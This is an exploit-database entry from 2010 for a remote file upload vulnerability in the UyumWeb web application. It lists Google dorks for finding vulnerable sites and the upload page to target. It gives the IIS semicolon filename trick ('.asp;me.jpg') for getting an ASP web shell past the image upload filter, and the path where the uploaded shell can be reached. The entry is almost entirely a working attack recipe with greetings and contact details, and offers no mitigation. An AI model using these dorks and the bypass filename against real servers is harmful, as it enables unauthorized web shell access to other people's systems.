id: 12373
date: 05/23/2010
title: UyumWeb Remote File upload Vulnerability
author: Emre5807
cves: 

========================================
UyumWeb Remote File upload Vulnerability
========================================

###########################

Author : Emre5807

Homepage : http://www.1923turk.com

###########################


[+] G00gle Dork :


intext:Copyright ? 2009 UyumWeb


inurl:upload/yukle.asp

inurl:upload/liste.asp

inurl:upload/resimyukle.asp


Upload Shell ;


[+] Exploit : http://emre5807.com/upload/yukle.asp


emre5807.asp;me.jpg


http://emre5807.com/Editor/assets/emre5807.asp;me.jpg


[+] Contact : sivasli_58_58@hotmail.com


##############################################################################################################
# Greetz : CodeS - VatanAy - TurkishWarrior - DJ_K_A_H_I_R - LegenDSemih - Enes_60 - Gamoscu - Manas58
##############################################################################################################



#  0day.today [2023-03-24]  #